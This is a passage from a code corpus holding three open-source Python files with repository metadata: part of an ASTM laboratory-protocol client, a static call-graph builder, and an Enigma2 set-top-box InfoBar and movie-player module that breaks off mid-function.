If :const:`None` this timer will be disabled.
:type timeout: int
:param flow_map: Records flow map. Used by :class:`RecordsStateMachine`.
:type: dict
:param chunk_size: Chunk size in bytes. :const:`None` value prevents
records chunking.
:type chunk_size: int
:param bulk_mode: Sends all records for single session (starts from Header
and ends with Terminator records) via single message
instead of sending each record separately. If result
message is too long, it may be split by chunks if
`chunk_size` is not :const:`None`. Keep in mind, that
collecting all records for single session may take some
time and server may reject data by timeout reason.
:type bulk_mode: bool
Base `emitter` is a generator that yield ASTM records one by one preserving
their order::
from astm.records import (
HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord
)
def emitter():
assert (yield HeaderRecord()), 'header was rejected'
ok = yield PatientRecord(name={'last': 'foo', 'first': 'bar'})
if ok: # you also can decide what to do in case of record rejection
assert (yield OrderRecord())
yield TerminatorRecord() # we may do not care about rejection
    :class:`Client`, through :class:`RecordsStateMachine`, keeps track of
    this order, raising :exc:`AssertionError` if it is broken.
    When `emitter` terminates with a :exc:`StopIteration` or :exc:`GeneratorExit`
    exception, the client connection to the server is closed as well. You may
    provide an endless `emitter` by wrapping the function body in a
    ``while True: ...`` loop that polls data from the source from time to time.
    Note that the server may enforce communication timeouts and close the
    session after some period of inactivity, so be sure that you're able to
    send a whole session (started by a Header record and ended by a Terminator
    one) within a limited time frame (commonly 10-15 sec.).
"""
#: Wrapper of emitter to provide session context and system logic about
#: sending head and tail data.
emitter_wrapper = Emitter
def __init__(self, emitter, host='localhost', port=15200,
encoding=None, timeout=20, flow_map=DEFAULT_RECORDS_FLOW_MAP,
chunk_size=None, bulk_mode=False):
super(Client, self).__init__(timeout=timeout)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.connect((host, port))
self.emitter = self.emitter_wrapper(
emitter,
encoding=encoding or self.encoding,
flow_map=flow_map,
chunk_size=chunk_size,
bulk_mode=bulk_mode
)
self.terminator = 1
def handle_connect(self):
"""Initiates ASTM communication session."""
super(Client, self).handle_connect()
self._open_session()
def handle_close(self):
self.emitter.close()
super(Client, self).handle_close()
def _open_session(self):
self.push(ENQ)
def _close_session(self, close_connection=False):
self.push(EOT)
if close_connection:
self.close_when_done()
def run(self, timeout=1.0, *args, **kwargs):
"""Enters into the :func:`polling loop <astm.asynclib.loop>` to let
client send outgoing requests."""
loop(timeout, *args, **kwargs)
def on_enq(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive ENQ.')
def on_ack(self):
"""Handles ACK response from server.
Provides callback value :const:`True` to the emitter and sends next
message to server.
"""
try:
message = self.emitter.send(True)
except StopIteration:
self._close_session(True)
else:
self.push(message)
if message == EOT:
self._open_session()
def on_nak(self):
"""Handles NAK response from server.
        If it was received on an ENQ request, the client tries to repeat the
        last request for the allowed number of attempts. For other messages it
        sends the callback value :const:`False` to the emitter."""
if self._last_sent_data == ENQ:
return self.push(ENQ)
try:
message = self.emitter.send(False)
except StopIteration:
self._close_session(True)
except Exception:
self._close_session(True)
raise
else:
self.push(message)
if message == EOT:
self._open_session()
def on_eot(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive EOT.')
def on_message(self):
"""Raises :class:`NotAccepted` exception."""
raise NotAccepted('Client should not receive ASTM message.')
def on_timeout(self):
"""Sends final EOT message and closes connection after his receiving."""
super(Client, self).on_timeout()
self._close_session(True)
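# Minimal usage sketch (illustrative; host/port are assumptions). It wires
# the emitter example from the Client docstring to a Client instance and
# enters the polling loop.
if __name__ == '__main__':
    from astm.records import HeaderRecord, TerminatorRecord

    def example_emitter():
        assert (yield HeaderRecord()), 'header was rejected'
        yield TerminatorRecord()

    client = Client(example_emitter, host='localhost', port=15200)
    client.run()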
|
eddiep1101/python-astm
|
build/lib/astm/client.py
|
Python
|
bsd-3-clause
| 12,288
| 0.000488
|
# -*- coding: utf-8 -*-
#
# LICENCE MIT
#
# DESCRIPTION Callgraph builder.
#
# AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz>
#
from operator import attrgetter
from inspect import signature
from callgraph.hooks import Hooks
from callgraph.utils import AuPair
from callgraph.symbols import Symbol, UnarySymbol
from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol
from callgraph.nodes import make_node
from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree
# TODO(burlog): hooks as callbacks
# TODO(burlog): properties tests
# TODO(burlog): process signature? are defs invoked during import?
# TODO(burlog): tests for global variables
# TODO(burlog): __getattr__, __getattribute__ overrides will be problem
# TODO(burlog): make result of list(), tuple(), dict(), ... iterable
class CallGraphBuilder(object):
def __init__(self, global_variables={}, silent=False):
self.printer = NonePrinter() if silent else IndentPrinter()
self.global_symbols = self.make_kwargs_symbols(global_variables)
self.hooks = Hooks(self)
self.current_lineno = 0
self.tot = None
def print_banner(self, printer, node):
extra = "<" + node.qualname + "> " if node.qualname != node.name else ""
printer("@ Analyzing: {0} {1}at {2}:{3}"\
.format(node.ast.name, extra, node.filename, node.lineno))
def set_current_lineno(self, printer, expr_lineno):
lineno = self.tot.lineno + expr_lineno
if lineno == self.current_lineno: return
self.current_lineno = lineno
printer("+ line at {0}:{1}".format(self.tot.filename, lineno))
printer("+", self.tot.source_line(expr_lineno).strip())
def make_kwargs_symbols(self, kwargs):
return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items())
def build(self, function, kwargs={}):
self.root = None
self.hooks.clear()
symbol = UnarySymbol(self, function.__name__, function)
return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs))
def process(self, symbol, parent=None, args=[], kwargs={}):
# attach new node to parent list
node = make_node(symbol)
with AuPair(self, node):
if parent:
where = parent.filename, self.current_lineno
if not parent.attach(node, where): return node
# builtins or c/c++ objects have no code
if node.is_opaque: return node
if not symbol.iscallable(): return node
# print nice banner
self.print_banner(self.printer, node)
# magic follows
with self.printer as printer:
self.inject_arguments(printer, node, args, kwargs)
self.process_function(printer, node, args, kwargs)
return node
def process_function(self, printer, node, args, kwargs):
for expr in node.ast.body:
for callee, args, kwargs in expr.evaluate(printer, node.symbol):
self.process(callee, node, args.copy(), kwargs.copy())
def inject_arguments(self, printer, node, args, kwargs):
sig = signature(node.symbol.value)
self.inject_self(printer, node, sig, args, kwargs)
bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs))
self.inject_defaults(printer, node, sig, bound)
for name, value in bound.arguments.items():
value_symbol = self.as_symbol(value)
printer("% Binding argument:", name + "=" + str(value_symbol))
node.symbol.set(name, value_symbol)
def polish_kwargs(self, sig, kwargs):
for param in sig.parameters.values():
if param.kind == param.VAR_KEYWORD:
return kwargs
return dict(self.iter_kwargs(sig, kwargs))
def iter_kwargs(self, sig, kwargs):
for param in sig.parameters.values():
if param.kind == param.POSITIONAL_OR_KEYWORD:
if param.name in kwargs:
yield param.name, kwargs[param.name]
def inject_self(self, printer, node, sig, args, kwargs):
if node.symbol.myself and sig.parameters:
# TODO(burlog): better bound method detection
if next(iter(sig.parameters.keys())) == "self":
args.insert(0, node.symbol.myself)
else:
# TODO(burlog): improve detection logic
kwargs["self"] = node.symbol.myself
def inject_defaults(self, printer, node, sig, bound):
for param in sig.parameters.values():
if param.name not in bound.arguments:
if param.default is not param.empty:
symbol = UnarySymbol(self, param.name, param.default)
bound.arguments[param.name] = symbol
def as_symbol(self, value):
if isinstance(value, Symbol):
return value
elif isinstance(value, (tuple, list)):
return IterableConstantSymbol(self, tuple, value)
elif isinstance(value, dict):
values = list(value.values())
keys = list(UnarySymbol(self, "str", k) for k in value.keys())
return MappingConstantSymbol(self, dict, keys, values)
raise RuntimeError("Can't convert value to symbol: " + str(value))
# dogfooding build function
if __name__ == "__main__":
builder = CallGraphBuilder()
kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build}
root = builder.build(CallGraphBuilder.build, kwargs)
print(80 * "=")
dump_tree(root, lambda x: x.children)
|
burlog/py-static-callgraph
|
callgraph/builder.py
|
Python
|
mit
| 5,632
| 0.002308
|
from Tools.Profile import profile
from Tools.BoundFunction import boundFunction
# workaround for required config entry dependencies.
import Screens.MovieSelection
from Components.PluginComponent import plugins
from Plugins.Plugin import PluginDescriptor
from Screens.Screen import Screen
from Screens.MessageBox import MessageBox
from Components.Label import Label
from Components.Pixmap import MultiPixmap
from Tools.Directories import fileExists
profile("LOAD:enigma")
import enigma
import os
from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName
boxtype = getBoxType()
profile("LOAD:InfoBarGenerics")
from Screens.InfoBarGenerics import InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \
InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \
InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \
InfoBarSubserviceSelection, InfoBarShowMovies, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \
InfoBarSummarySupport, InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \
InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, setResumePoint, delResumePoint
from Screens.ButtonSetup import InfoBarButtonSetup
profile("LOAD:InitBar_Components")
from Components.ActionMap import HelpableActionMap
from Components.Timeshift import InfoBarTimeshift
from Components.config import config
from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase
profile("LOAD:HelpableScreen")
from Screens.HelpMenu import HelpableScreen
class InfoBar(InfoBarBase, InfoBarShowHide,
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder,
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton,
HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection,
InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer,
InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions,
InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper,
InfoBarHdmi, Screen, InfoBarButtonSetup):
ALLOW_SUSPEND = True
instance = None
def __init__(self, session):
Screen.__init__(self, session)
if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')):
self.skinName = "OPD-Blue-Line/skin.xml"
self["actions"] = HelpableActionMap(self, "InfobarActions",
{
"showMovies": (self.showMovies, _("Play recorded movies...")),
"showRadio": (self.showRadioButton, _("Show the radio player...")),
"showTv": (self.showTvButton, _("Show the tv player...")),
"toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")),
"openBouquetList": (self.openBouquetList, _("Open bouquetlist...")),
"showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")),
"openBouquetList": (self.openBouquetList, _("open bouquetlist")),
"openWeather": (self.openWeather, _("Open Weather...")),
"openTimerList": (self.openTimerList, _("Open Timerlist...")),
"openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")),
"openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")),
"openIMDB": (self.openIMDB, _("Open IMDB...")),
"showMC": (self.showMediaCenter, _("Show the media center...")),
"openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")),
'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')),
'ZoomOff': (self.ZoomOff, _('Zoom Off...')),
'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')),
"showWWW": (self.showPORTAL, _("Open MediaPortal...")),
"showSetup": (self.showSetup, _("Show setup...")),
"showFormat": (self.showFormat, _("Show Format Setup...")),
"showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")),
"showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")),
}, prio=2)
self["key_red"] = Label()
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self.allowPiP = True
self.radioTV = 0
for x in HelpableScreen, \
InfoBarBase, InfoBarShowHide, \
InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \
InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \
InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \
InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \
InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \
InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup:
x.__init__(self)
self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))]))
self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))]))
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged
})
self.current_begin_time=0
assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
InfoBar.instance = self
if config.misc.initialchannelselection.value:
self.onShown.append(self.showMenu)
self.zoomrate = 0
self.zoomin = 1
self.onShow.append(self.doButtonsCheck)
def showMenu(self):
self.onShown.remove(self.showMenu)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.mainMenu()
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None":
self["key_red"].setText(_("Single EPG"))
else:
self["key_red"].setText(_("ViX EPG"))
if not config.plisettings.Subservice.value:
self["key_green"].setText(_("Timers"))
else:
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
InfoBar.instance = None
def __eventInfoChanged(self):
if self.execing:
service = self.session.nav.getCurrentService()
old_begin_time = self.current_begin_time
info = service and service.info()
ptr = info and info.getEvent(0)
self.current_begin_time = ptr and ptr.getBeginTime() or 0
if config.usage.show_infobar_on_event_change.value:
if old_begin_time and old_begin_time != self.current_begin_time:
self.doShow()
def serviceStarted(self): #override from InfoBarShowHide
new = self.servicelist.newServicePlayed()
if self.execing:
InfoBarShowHide.serviceStarted(self)
self.current_begin_time=0
elif not self.__checkServiceStarted in self.onShown and new:
self.onShown.append(self.__checkServiceStarted)
def __checkServiceStarted(self):
self.serviceStarted()
self.onShown.remove(self.__checkServiceStarted)
def openBouquetList(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "ChannelList":
self.showTvChannelList(True)
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
self.servicelist.showFavourites()
def showTvButton(self):
if boxtype.startswith('gb') or boxtype in ('classm', 'genius', 'evo', 'galaxym6'):
self.toogleTvRadio()
elif boxtype in ('uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin'):
self.showMovies()
else:
self.showTv()
def showTv(self):
if config.usage.tvradiobutton_mode.value == "MovieList":
self.showTvChannelList(True)
self.showMovies()
elif config.usage.tvradiobutton_mode.value == "BouquetList":
self.showTvChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showTvChannelList(True)
def showRadioButton(self):
if boxtype.startswith('gb') or boxtype.startswith('azbox') or boxtype in ('classm', 'genius', 'evo', 'galaxym6', 'uniboxhd1', 'uniboxhd2', 'uniboxhd3', 'sezam5000hd', 'mbtwin', 'beyonwizt3'):
self.toogleTvRadio()
else:
self.showRadio()
def showRadio(self):
if config.usage.e1like_radio_mode.value:
if config.usage.tvradiobutton_mode.value == "BouquetList":
self.showRadioChannelList(True)
if config.usage.show_servicelist.value:
self.servicelist.showFavourites()
else:
self.showRadioChannelList(True)
else:
self.rds_display.hide() # in InfoBarRdsDecoder
from Screens.ChannelSelection import ChannelSelectionRadio
self.session.openWithCallback(self.ChannelSelectionRadioClosed, ChannelSelectionRadio, self)
def toogleTvRadio(self):
if self.radioTV == 1:
self.radioTV = 0
self.showTv()
else:
self.radioTV = 1
self.showRadio()
def ChannelSelectionRadioClosed(self, *arg):
self.rds_display.show() # in InfoBarRdsDecoder
self.radioTV = 0
self.doShow()
def showMovies(self, defaultRef=None):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMoviePlayer(defaultRef)
def showMoviePlayer(self, defaultRef=None): #for using with hotkeys (ButtonSetup.py) regardless of plugins which overwrite the showMovies function
self.lastservice = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if self.lastservice and ':0:/' in self.lastservice.toString():
self.lastservice = enigma.eServiceReference(config.movielist.curentlyplayingservice.value)
self.session.openWithCallback(self.movieSelected, Screens.MovieSelection.MovieSelection, defaultRef, timeshiftEnabled = self.timeshiftEnabled())
def movieSelected(self, service):
ref = self.lastservice
del self.lastservice
if service is None:
if ref and not self.session.nav.getCurrentlyPlayingServiceOrGroup():
self.session.nav.playService(ref)
else:
self.session.open(MoviePlayer, service, slist = self.servicelist, lastservice = ref)
def showMediaPlayer(self):
try:
from Plugins.Extensions.MediaPlayer.plugin import MediaPlayer
self.session.open(MediaPlayer)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPlayer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showMediaCenter(self):
try:
from Plugins.Extensions.BMediaCenter.plugin import DMC_MainMenu
self.session.open(DMC_MainMenu)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaCenter plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openSleepTimer(self):
from Screens.SleepTimerEdit import SleepTimerEdit
self.session.open(SleepTimerEdit)
def openTimerList(self):
from Screens.TimerEdit import TimerEditList
self.session.open(TimerEditList)
def openPowerTimerList(self):
from Screens.PowerTimerEdit import PowerTimerEditList
self.session.open(PowerTimerEditList)
def openAutoTimerList(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("AutoTimer"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The AutoTimer plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openWeather(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Weather Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The Weather plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openEPGSearch(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("EPGSearch") or plugin.name == _("search EPG...") or plugin.name == "Durchsuche EPG...":
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The EPGSearch plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def openIMDB(self):
try:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_PLUGINMENU ,PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("IMDb Details"):
self.runPlugin(plugin)
break
except Exception, e:
self.session.open(MessageBox, _("The IMDb plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def ZoomInOut(self):
zoomval = 0
if self.zoomrate > 3:
self.zoomin = 0
elif self.zoomrate < -9:
self.zoomin = 1
if self.zoomin == 1:
self.zoomrate += 1
else:
self.zoomrate -= 1
if self.zoomrate < 0:
zoomval = abs(self.zoomrate) + 10
else:
zoomval = self.zoomrate
print 'zoomRate:', self.zoomrate
print 'zoomval:', zoomval
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write('%d' % int(zoomval))
file.close()
def ZoomOff(self):
self.zoomrate = 0
self.zoomin = 1
if fileExists("/proc/stb/vmpeg/0/zoomrate"):
file = open('/proc/stb/vmpeg/0/zoomrate', 'w')
file.write(str(0))
file.close()
def HarddiskSetup(self):
from Screens.HarddiskSetup import HarddiskSelection
self.session.open(HarddiskSelection)
def showPORTAL(self):
try:
from Plugins.Extensions.MediaPortal.plugin import MPmain as MediaPortal
MediaPortal(self.session)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The MediaPortal plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showSetup(self):
from Screens.Menu import MainMenu, mdom
root = mdom.getroot()
for x in root.findall("menu"):
y = x.find("id")
if y is not None:
id = y.get("val")
if id and id == "setup":
self.session.infobar = self
self.session.open(MainMenu, x)
return
def showFormat(self):
try:
from Plugins.SystemPlugins.Videomode.plugin import videoSetupMain
self.session.instantiateDialog(videoSetupMain)
no_plugin = False
except Exception, e:
self.session.open(MessageBox, _("The VideoMode plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showPluginBrowser(self):
from OPENDROID.GreenPanel import GreenPanel
self.session.open(GreenPanel)
def showBoxPortal(self):
if getMachineBrand() == 'GI' or boxtype.startswith('azbox') or boxtype.startswith('ini') or boxtype.startswith('venton'):
from Screens.BoxPortal import BoxPortal
self.session.open(BoxPortal)
else:
self.showMovies()
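# Module-level audio helpers (descriptive note, inferred from the logic
# below): pick an audio track preferring the configured auto-select
# languages, optionally trying AC3 tracks before MPEG ones, and falling
# back to track 0.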
def setAudioTrack(service):
try:
from Tools.ISO639 import LanguageCodes as langC
tracks = service and service.audioTracks()
nTracks = tracks and tracks.getNumberOfTracks() or 0
if not nTracks: return
idx = 0
trackList = []
for i in xrange(nTracks):
audioInfo = tracks.getTrackInfo(i)
lang = audioInfo.getLanguage()
if langC.has_key(lang):
lang = langC[lang][0]
desc = audioInfo.getDescription()
track = idx, lang, desc
idx += 1
trackList += [track]
seltrack = tracks.getCurrentTrack()
# we need default selected language from image
# to set the audiotrack if "config.autolanguage.audio_autoselect...values" are not set
from Components.Language import language
syslang = language.getLanguage()[:2]
syslang = langC[syslang][0]
if (config.autolanguage.audio_autoselect1.value or config.autolanguage.audio_autoselect2.value or config.autolanguage.audio_autoselect3.value or config.autolanguage.audio_autoselect4.value) != "---":
audiolang = [config.autolanguage.audio_autoselect1.value, config.autolanguage.audio_autoselect2.value, config.autolanguage.audio_autoselect3.value, config.autolanguage.audio_autoselect4.value]
caudiolang = True
else:
audiolang = syslang
caudiolang = False
useAc3 = config.autolanguage.audio_defaultac3.value
if useAc3:
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
tracks.selectTrack(0) # fallback to track 1(0)
return
else:
matchedMpeg = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, False)
if matchedMpeg: return
matchedAc3 = tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3)
if matchedAc3: return
tracks.selectTrack(0) # fallback to track 1(0)
except Exception, e:
print("[MoviePlayer] audioTrack exception:\n" + str(e))
def tryAudioTrack(tracks, audiolang, caudiolang, trackList, seltrack, useAc3):
for entry in audiolang:
if caudiolang:
				# more replacements are needed here for other languages, or new configs with another list!
				# choice gives only the value, never the description,
				# so we could also change "config.py" to expose the description too; then no replacing would be needed here
entry = entry.replace('eng qaa Englisch', 'English').replace('deu ger', 'German')
for x in trackList:
if entry == x[1] and seltrack == x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
else:
print("[MoviePlayer] audio track is current selected track: " + str(x))
return True
elif entry == x[1] and seltrack != x[0]:
if useAc3:
if x[2].startswith('AC'):
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
else:
print("[MoviePlayer] audio track match: " + str(x))
tracks.selectTrack(x[0])
return True
return False
class MoviePlayer(InfoBarAspectSelection, InfoBarSimpleEventView, InfoBarBase, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, InfoBarAudioSelection, HelpableScreen, InfoBarNotifications,
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport,
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, Screen, InfoBarTeletextPlugin,
InfoBarServiceErrorPopupSupport, InfoBarExtensions, InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarHdmi, InfoBarButtonSetup):
ENABLE_RESUME_SUPPORT = True
ALLOW_SUSPEND = True
instance = None
def __init__(self, session, service, slist = None, lastservice = None):
Screen.__init__(self, session)
InfoBarAspectSelection.__init__(self)
InfoBarAudioSelection.__init__(self)
InfoBarSimpleEventView.__init__(self)
self.pts_pvrStateDialog = ""
self["key_yellow"] = Label()
self["key_blue"] = Label()
self["key_green"] = Label()
self["eventname"] = Label()
self["state"] = Label()
self["speed"] = Label()
self["statusicon"] = MultiPixmap()
self["actions"] = HelpableActionMap(self, "MoviePlayerActions",
{
"leavePlayer": (self.leavePlayer, _("leave movie player...")),
"leavePlayerOnExit": (self.leavePlayerOnExit, _("leave movie player..."))
})
self.allowPiP = True
for x in HelpableScreen, InfoBarShowHide, InfoBarLongKeyDetection, InfoBarMenu, InfoBarEPG, \
InfoBarBase, InfoBarSeek, InfoBarShowMovies, InfoBarInstantRecord, \
InfoBarAudioSelection, InfoBarNotifications, InfoBarSimpleEventView, \
InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, \
InfoBarMoviePlayerSummarySupport, InfoBarSubtitleSupport, \
InfoBarTeletextPlugin, InfoBarServiceErrorPopupSupport, InfoBarExtensions, \
InfoBarPlugins, InfoBarPiP, InfoBarZoom, InfoBarButtonSetup:
x.__init__(self)
self.onChangedEntry = [ ]
self.servicelist = slist
self.lastservice = lastservice or session.nav.getCurrentlyPlayingServiceOrGroup()
session.nav.playService(service)
self.cur_service = service
self.returning = False
self.onClose.append(self.__onClose)
self.onShow.append(self.doButtonsCheck)
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
enigma.iPlayableService.evStart: self.__evStart
})
assert MoviePlayer.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!"
MoviePlayer.instance = self
# is needed for every first call of MoviePlayer
self.__evStart()
def __evStart(self):
self.switchAudioTimer = enigma.eTimer()
self.switchAudioTimer.callback.append(self.switchAudio)
self.switchAudioTimer.start(750, True) # 750 is a safe-value
def switchAudio(self):
service = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if service:
			# take this path for container formats other than our own recordings (those switch via PMT)
path = service.getPath()
import os
ext = os.path.splitext(path)[1].lower()
exts = [".mkv", ".avi", ".divx", ".mp4"] # we need more extensions here ?
if ext.lower() in exts:
service = self.session.nav.getCurrentService()
if service:
setAudioTrack(service)
def doButtonsCheck(self):
if config.plisettings.ColouredButtons.value:
self["key_yellow"].setText(_("Extensions"))
self["key_green"].setText(_("Green Panel"))
self["key_blue"].setText(_("Blue Panel"))
def __onClose(self):
MoviePlayer.instance = None
from Screens.MovieSelection import playlist
del playlist[:]
Screens.InfoBar.InfoBar.instance.callServiceStarted()
self.session.nav.playService(self.lastservice)
config.usage.last_movie_played.value = self.cur_service.toString()
config.usage.last_movie_played.save()
def handleLeave(self, how):
self.is_closing = True
if how == "ask":
if config.usage.setup_level.index < 2: # -expert
list = (
(_("Yes"), "quit"),
(_("No"), "continue")
)
else:
list = (
(_("Yes"), "quit"),
(_("Yes, returning to movie list"), "movielist"),
(_("Yes, and delete this movie"), "quitanddelete"),
(_("Yes, delete this movie and return to movie list"), "deleteandmovielist"),
(_("No"), "continue"),
(_("No, but restart from begin"), "restart")
)
from Screens.ChoiceBox import ChoiceBox
self.session.openWithCallback(self.leavePlayerConfirmed, ChoiceBox, title=_("Stop playing this movie?"), list = list)
else:
self.leavePlayerConfirmed([True, how])
def leavePlayer(self):
setResumePoint(self.session)
self.handleLeave(config.usage.on_movie_stop.value)
def leavePlayerOnExit(self):
if self.shown:
self.hide()
elif self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
if config.usage.pip_hideOnExit.value == "popup":
self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
else:
